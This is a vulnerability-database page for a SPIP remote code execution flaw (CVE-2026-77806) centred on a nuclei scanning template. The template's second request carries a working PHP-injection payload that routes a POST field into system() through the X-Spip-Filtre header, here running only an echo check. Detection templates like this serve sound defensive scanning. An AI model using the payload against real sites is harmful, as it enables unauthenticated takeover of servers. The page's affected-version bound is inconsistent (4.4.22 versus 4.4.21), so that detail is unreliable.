Lucene search
+L

SPIP < 4.4.22 - Unauthenticated RCE

🗓️ 17 Sep 2026 02:05:52Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 9 Views

Unauthenticated RCE in SPIP < 4.4.21 via X-Spip-Filtre header in analyse_resultat_skel.

Related
Refs
Code
ReporterTitlePublishedViews
Family
bdu_fstec
BDU FSTEC
The vulnerability of the analyse_resultat_skel() function in the SPIP content management system allows a hacker to execute arbitrary code.
2 Sep 202600:00
bdu_fstec
circl
Circl
CVE-2026-77806
21 Aug 202614:18
circl
cve
CVE
CVE-2026-77806
21 Aug 202613:37
cve
cvelist
Cvelist
CVE-2026-77806
21 Aug 202613:37
cvelist
debiancve
Debian CVE
CVE-2026-77806
21 Aug 202613:37
debiancve
euvd
EUVD
EUVD-2026-63948
21 Aug 202613:37
euvd
kitploit
Kitploit
CVE-2026-77806
15 Sep 202608:23
kitploit
nvd
NVD
CVE-2026-77806
21 Aug 202614:16
nvd
osv
OSV
DEBIAN-CVE-2026-77806
21 Aug 202614:16
osv
osv
OSV
UBUNTU-CVE-2026-77806
21 Aug 202614:16
osv
Rows per page
id: CVE-2026-77806

info:
  name: SPIP < 4.4.22 - Unauthenticated RCE
  author: 0x_Akoko
  severity: critical
  description: |
    SPIP < 4.4.21 contains a remote code execution caused by mishandling of the X-Spip-Filtre HTTP request header in analyse_resultat_skel, letting unauthenticated remote attackers execute arbitrary code.
  impact: |
    Unauthenticated remote attackers can execute arbitrary code, potentially leading to full system compromise.
  remediation: |
    Update to version 4.4.21 or later.
  reference:
    - https://securityonline.info/cve-2026-77806-spip-unauthenticated-rce/
    - https://blog.spip.net/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-77806
    epss-score: 0.04201
    epss-percentile: 0.90444
    cwe-id: CWE-94
  metadata:
    max-request: 1
    verified: true
    shodan-query: http.component:"SPIP"
    fofa-query: body="spip.php"
  tags: cve,cve2026,spip,rce,unauth,vkev

variables:
  marker: "{{rand_text_alphanumeric(8)}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /spip.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_any(tolower(body), "spip.php", "spip_document", "spip_logo")'
        condition: and
        internal: true

  - raw:
      - |
        POST /spip.php?page=sommaire&{{rand_text_alpha(8)}}=%3C%3Fphp%20header(%22X-Spip-Filtre:%20intval|_request|system%22);%20%3F%3E HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        0=echo {{marker}}

    redirects: true
    max-redirects: 3

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{{marker}}")'
        condition: and
# digest: 4b0a00483046022100e7add58b22d9676563afcb8739ab4a656672158ae4948ebfd282b72d9dfa91020221008d1b82fa806702d71210678b43c3aac856b9e1fae7912e05448bd990aada26d2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Aug 2026 11:30Current
8.8High risk
Vulners AI Score8.8
CVSS 3.19.8
EPSS0.04201
SSVC
9